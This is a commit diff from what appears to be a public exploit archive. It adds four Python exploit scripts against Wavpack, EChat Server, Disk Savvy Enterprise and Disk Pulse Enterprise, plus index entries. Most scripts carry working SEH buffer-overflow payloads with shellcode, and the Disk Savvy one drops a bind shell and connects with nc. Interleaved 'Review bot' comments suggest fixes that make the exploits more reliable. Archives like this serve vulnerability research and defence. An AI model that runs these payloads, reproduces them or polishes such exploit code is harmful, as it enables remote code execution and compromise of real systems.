DB: 2018-02-22
4 changes to exploits/shellcodes Wavpack 5.1.0 - Denial of Service utorrent - JSON-RPC Remote Code Execution / Information Disclosure μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
parent
b5d3581200
commit
a4f01ec6e4
5 changed files with 251 additions and 1 deletions
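--- a/exploits/multiple/dos/44154.py
+++ b/exploits/multiple/dos/44154.py
@@ -0,0 +1,44 @@
+# Exploit title: Wavpack 5.1.0 - Denial of Service
+# Date: 20.02.2018
+# Exploit Author: r4xis
+# https://github.com/r4xis
+#
+# Vendor Homepage: http://www.wavpack.com/
+# Software Links: http://www.wavpack.com/downloads.html
+# https://github.com/dbry/WavPack
+#
+#
+# Version: Wavpack 5.1.0
+# Tested on: Debian 9.3.0 64 bit
+# Windows 7 32 bit and 64 bit
+# Windows 8 64 bit
+#
+#
+# CVE: CVE-2018-7254
+# CVE Details:
+# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
+# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
+# https://github.com/dbry/WavPack/issues/26
+
+
+import os
+
+head = "\x63\x61\x66\x66"
+version = "\x00\x01"
+junk1 = "\x00"*(0xa0-6)
+crash = "\x80"
+junk2 = "\x00"*100
+
+f=open("poc.caf", 'w')
+f.write(head+version+junk1+crash+junk2)
+f.close()
+
+os.system("wavpack poc.caf")
+
+'''
+Debian gdb output:
+Program received signal SIGSEGV, Segmentation fault.
+__memmove_sse2_unaligned_erms ()
+at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
+333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
+'''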
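Review bot: The PoC writes raw bytes through `open("poc.caf", 'w')`, i.e. text mode; under Python 3 the `"\x80"` crash byte would be UTF-8-encoded to two bytes and the offset the header comments rely on (`0xa0-6` bytes of padding) would shift, and on Windows text mode can rewrite newline bytes. Open the file in binary mode with a context manager, `with open("poc.caf", "wb") as f:` / `f.write(head + version + junk1 + crash + junk2)`, with the literals as `b"..."` if the script is meant to run under Python 3, and say in the header which Python version was used. `os.system("wavpack poc.caf")` goes through a shell; with a fixed argument that is only hygiene, but `subprocess.call(["wavpack", "poc.caf"])` is the safer habit. The header could also state what the gdb trace shows, a crash inside memmove, so a reader knows the PoC demonstrates only a SIGSEGV and not a controlled write.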
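--- a/exploits/windows/remote/44155.py
+++ b/exploits/windows/remote/44155.py
@@ -0,0 +1,65 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com>
+# Vulnerability found using Exploit Pack v10 - http://exploitpack.com
+#
+# Impact:
+# An attacker could exploit this vulnerability to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in adenial-of-service condition.
+#
+# Program description:
+# Easy Chat Server is a easy, fast and affordable way to host and manage your own real-time communication software,
+# it allows friends/colleagues to chat with you through a Web Browser (IE, Safari, Chrome, Opera etc.)
+# Vendor page: http://www.echatserver.com/
+
+import string, sys
+import socket, httplib
+import struct
+
+def exploit():
+    try:
+        junk = '\x41' * 217
+        shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH
+        seh = struct.pack('<L', 0x100154c5) # ADD ESP,2C # POP ESI # ADD ESP,0C # RETN ** [SSLEAY32.dll] ** | {PAGE_EXECUTE_READ}
+        buffersize = 2775
+        nops = "\x90"
+        # debug = "\xcc\xcc\xcc\xcc"
+        shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+        "\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
+        "\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
+        "\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
+        "\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
+        "\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
+        "\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
+        "\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
+        "\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
+        "\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
+        "\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
+        "\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
+        "\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
+        "\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
+        "\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
+        "\x1c\x80")
+        buffer = junk + shortjmp + seh + nops * (buffersize -
+        (len(shellcode))) + shellcode
+        print buffer
+        URL = '/chat.ghp?username=' + buffer + '&password=null&room=1&null=2'
+        conn = httplib.HTTPConnection(host, port)
+        conn.request('GET', URL)
+        conn.close()
+    except Exception as Error:
+        print "[!] Something went wrong!"
+        print Error
+
+def howtousage():
+    print "[!] Sorry, minimum required arguments: [host] [port]"
+    sys.exit(-1)
+
+if __name__ == '__main__':
+    print "[*] EChat Server v3.1 CHAT.ghp (UserName)"
+    print "[*] Author: Juan Sacco <jsacco@exploitpack>"
+
+    try:
+        host = sys.argv[1]
+        port = sys.argv[2]
+    except IndexError:
+        howtousage()
+    exploit()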
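Review bot: The header lacks the title, version, software-link and tested-on lines the sibling files carry, and nothing states that the script is Python 2 only (`print` statements, `httplib`); add `# Exploit Title: EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow (SEH)`, `# Version: 3.1`, `# Tested on: <OS used>` and a `# Python 2 only` line. `print buffer` dumps roughly 3 KB of raw shellcode bytes to the terminal before the request goes out; `print "[*] Sending %d bytes" % len(buffer)` is the useful message. `port` reaches `httplib.HTTPConnection` as the argv string, which works only because `getaddrinfo` accepts numeric strings — `port = int(sys.argv[2])` makes a bad argument fail early. The comment on `seh` describes an `ADD ESP,2C # POP ESI # ADD ESP,0C # RETN` stack-adjust gadget rather than a POP/POP/RET, so it is not obvious from the file that execution ever reaches the `shortjmp` bytes in nSEH; a comment explaining where that RETN lands would make the chain reviewable.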
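--- a/exploits/windows/remote/44156.py
+++ b/exploits/windows/remote/44156.py
@@ -0,0 +1,92 @@
+# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
+# Date: 01/02/2018
+# Exploit Author: Daniel Teixeira
+# Vendor Homepage: http://www.disksavvy.com/
+# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
+# Version: 10.4.18
+# CVE: CVE-2018-6481
+# Tested on: Windows 7 x86
+
+
+from struct import pack
+from os import system
+from sys import exit
+from time import sleep
+import socket
+
+port = 9124
+host = "172.16.40.148"
+
+# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode
+shellcode = ""
+shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
+shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
+shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
+shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
+shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
+shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
+shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
+shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
+shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
+shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
+shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
+shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
+shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
+shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
+shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
+shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
+shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
+shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
+shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
+shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
+shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
+shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
+shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
+shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
+shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
+shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
+shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
+shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
+shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
+shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
+
+payload = "A" * 124 # offset
+payload += "\x90\x09\xeb\x05" # jmp over seh retrun value
+payload += "\x13\x6d\x05\x10" # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)
+
+
+
+payload += "\x90" * 10
+payload += "\x83\xc4\x64" * 20 # metasm > add esp,100
+payload += "\xff\xe4" # metasm > jmp esp
+payload += "\x90" * (1000 - len(payload) - len(shellcode))
+payload += shellcode
+
+header = "\x75\x19\xba\xab"
+header += "\x03\x00\x00\x00"
+header += "\x00\x40\x00\x00"
+header += pack('<I', len(payload))
+header += pack('<I', len(payload))
+header += pack('<I', ord(payload[-1]))
+packet = header
+packet += payload
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+
+    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    s.connect((host, port))
+
+except:
+
+    print "[-] Unable to communicate to target %s:%s" %(host,port)
+
+    exit()
+
+s.send(packet)
+
+print "[*] Payload Sent.."
+print "[*] Connecting to bind shell %s:4444 .." %host
+sleep(5)
+system("nc %s 4444"%host)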
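Review bot: The target is hard-coded (`host = "172.16.40.148"`, `port = 9124`) and the bare `except:` around `s.connect` also swallows `KeyboardInterrupt` and `SystemExit` while hiding the real error; take host and port from `sys.argv` and narrow the handler to `except socket.error as e:` so the message can include `e`. `s.send(packet)` does not guarantee the whole ~1 KB packet is written — use `s.sendall(packet)` and `s.close()` before spawning `nc`. `system("nc %s 4444" % host)` builds a shell command from the host string; once the host comes from argv, `subprocess.call(["nc", host, "4444"])` avoids shell interpretation of whatever is passed. The script is Python 2 only (`print` statements, `ord(payload[-1])` on a `str` payload), which the header should state next to "Tested on".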
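--- a/exploits/windows/remote/44157.py
+++ b/exploits/windows/remote/44157.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+# Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH)
+# Date: 2018-01-22
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.diskpulse.com
+# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe
+# Version: 10.4.16
+# Tested on: Windows 7 SP1 x86
+# CVE: CVE-2017-7310
+
+import os,struct
+
+#Buffer overflow
+junk = "A"*1560
+
+#JMP ESP (QtGui4.dll)
+jmpesp= struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4C"
+#JMP ESP
+jmp = "\xFF\xE0"
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (QtGui4.dll)
+SEH = struct.pack('<L',0x67033072)
+
+#CALC.EXE
+shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+#PAYLOAD
+payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
+
+f = open('Exploit.xml', 'w')
+f.write(file)
+f.close()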
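Review bot: The header contradicts itself: the title and software link say v10.4.18 while the line reads `# Version: 10.4.16`, so one of them needs correcting before the entry is indexed. `open('Exploit.xml', 'w')` writes a payload of raw bytes (`\x90`, `\x8D`, the struct-packed addresses) in text mode; under Python 3 those would be UTF-8-encoded and every offset would shift, and on Windows text mode rewrites the `\n` bytes in the XML wrapper, so use `with open('Exploit.xml', 'wb') as f:` and state that the script targets Python 2. The wrapper never closes the `name='` attribute or the `<classify` tag; if that is deliberate because the parser overflows before it matters, a one-line comment saying so will stop the next reader from "fixing" it. The payload places `jmpesp` at offset 1560 and the nSEH/SEH pair further on, so a comment on which path (direct return-address overwrite or the SEH chain) is the one expected to fire would make the layout reviewable.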
@ -5869,6 +5869,7 @@ id,file,description,date,author,type,platform,port
43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
44146,exploits/windows/dos/44146.cpp,"Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure",2018-02-20,"Google Security Research",dos,windows,
44153,exploits/windows/dos/44153.html,"Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free",2018-02-20,"Google Security Research",dos,windows,
44154,exploits/multiple/dos/44154.py,"Wavpack 5.1.0 - Denial of Service",2018-02-21,r4xis,dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16244,7 +16245,10 @@ id,file,description,date,author,type,platform,port
43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows,
43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,
43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Root Remote Code Execution",2017-12-14,"Philip Pettersson",remote,hardware,
44151,exploits/multiple/remote/44151.txt,"utorrent - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows,
44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,